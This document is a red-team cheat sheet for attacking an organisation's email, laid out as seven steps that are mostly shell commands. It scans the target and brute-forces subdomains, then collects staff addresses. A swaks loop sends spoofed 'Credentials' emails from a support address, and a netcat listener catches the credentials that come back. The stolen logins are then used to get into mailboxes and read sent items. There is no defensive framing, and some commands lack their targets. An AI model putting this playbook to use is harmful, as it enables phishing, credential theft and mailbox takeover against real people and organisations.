# Red Team - Attack on SMTP 1. Information Gathering | `Techniques: Nmap Scanning` ```bash nmap -sV -sC -v -p- --min-rate=10000 ``` 2. Subdomain Enumeration | `Techniques: Using ffuf for subdomain Brute-Forcing` ```bash ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u https://TargetDomain.com -H "Host: FUZZ.TargetDomain.com" ``` 3. Email Collection | `Techniques: Extracting Email from Web Page` ```bash #Manually visit Target Domain / SubDomain and extract emails to mails.txt ``` 4. Email Engagement | `Techniques: Sending Emails with swaks` ```bash while read mail; do swaks --to $mail --from support@TargetDomain.com --header "Subject: Credentials" --body "goto" --server; done < mails.txt ``` 5. Credential Harvesting | `Techniques: Netcat Listener` ```bash nc -lvp 80 # to listen for incoming connections ``` 6. Accessing SMTP | `Techniques: Using evolution to Access SMTP` ```bash apt install evolution #and with Configure SMTP server and email user@TargetDomain.com ``` 7. Exploring Sent Items | `Techniques: Checking Sent Emails` ```bash #Check sent items for any useful information afther accessing the SMTP server ```